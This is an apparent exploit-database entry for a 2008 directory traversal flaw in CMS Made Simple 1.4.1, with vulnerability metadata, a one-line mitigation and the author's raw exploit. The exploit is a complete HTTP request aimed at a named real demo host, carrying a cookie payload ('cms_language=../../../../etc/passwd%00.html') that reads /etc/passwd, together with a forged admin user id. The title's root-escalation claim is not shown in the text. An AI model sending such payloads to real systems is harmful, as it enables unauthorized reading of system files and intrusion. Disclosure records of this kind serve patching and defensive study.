Directory Traversal vulnerability (Unix tested) / Root privileges escalation

vendor:

CMS Made Simple

by:

M4ck-h@cK

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: CMS Made Simple

Affected Version From: CMS Made Simple 1.4.1

Affected Version To: CMS Made Simple 1.4.1

Patch Exists: YES

Related CWE: N/A

CPE: a:cms_made_simple:cms_made_simple:1.4.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Unix

2008

Directory Traversal vulnerability (Unix tested) / Root privileges escalation

It is possible to set the 'cms_language' value in order to view the /etc/passwd file.

Mitigation:

Ensure that user input is validated and sanitized before being used in a file path.

Source

Exploit-DB raw data:

Type: Directory Traversal vulnerability (Unix tested) / Root privileges escalation
Vendor: CMS Made Simple
Software: CMS Made Simple 1.4.1 "Spring Garden" (and probably others ...)
Author: M4ck-h@cK
Date 29.11.2008
Home: sweet home
contact: no, thx :)

Exploit:


Demo: on h[ttp://demo.cmsmadesimple.fr/admin/]

GET http://demo.cmsmadesimple.fr/admin/login.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: demo.cmsmadesimple.fr
Cookie: cms_language=../../../../../../../../etc/passwd%00.html;cms_admin_user_id=1
Connection: Close
Pragma: no-cache

It's possible to set "cms_language" value in order to view /etc/passwd file.

# milw0rm.com [2008-11-29]